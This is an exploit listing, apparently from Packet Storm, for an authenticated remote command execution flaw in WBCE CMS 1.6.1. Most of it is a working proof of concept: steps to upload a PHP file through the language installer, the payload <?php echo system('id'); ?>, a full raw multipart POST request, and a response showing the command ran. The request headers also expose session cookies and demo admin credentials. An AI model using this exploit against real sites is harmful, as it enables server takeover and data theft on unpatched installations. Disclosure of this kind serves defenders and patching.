WBCE CMS 1.6.1 Shell Upload

2023-12-0100:00:00
tmrswrr
packetstormsecurity.com
156
exploit
remote command execution
security
vulnerability
shell upload
wbce cms 1.6.1
command injection
7.4 High
AI Score
Confidence
Low
JSON
`# Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution  
# Date: 30/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://wbce-cms.org/  
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip  
# Version: 1.6.1  
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS  
  
## POC:  
  
1 ) Login with admin cred and click Add-ons  
2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php  
4 ) You will be see id command result   
  
Result:   
  
uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)   
  
### Post Request:  
  
POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1  
Host: demos6.softaculous.com  
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459  
Content-Length: 522  
Origin: https://demos6.softaculous.com  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close  
  
-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="formtoken"  
  
5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c  
-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"  
Content-Type: application/x-php  
  
<?php echo system('id'); ?>  
  
-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="submit"  
  
  
-----------------------------86020911415982314764024459--  
  
### Response :   
  
<!-- ################### Up from here: Original Code from original template ########### -->  
  
<!-- senseless positioning-table: needed for old modules which base on class td.content -->  
<div class="row" style="overflow:visible">  
<div class="fg12">  
<table id="former_positioning_table">  
<tr>  
<td class="content">  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
<div class="top alertbox_error fg12 error-box">  
<i class=" fa fa-2x fa-warning signal"></i>  
  
<p>Invalid WBCE CMS language file. Please check the text file.</p>  
  
<p><a href="index.php" class="button">Back  
  
`
7.4 High
AI Score
Confidence
Low
JSON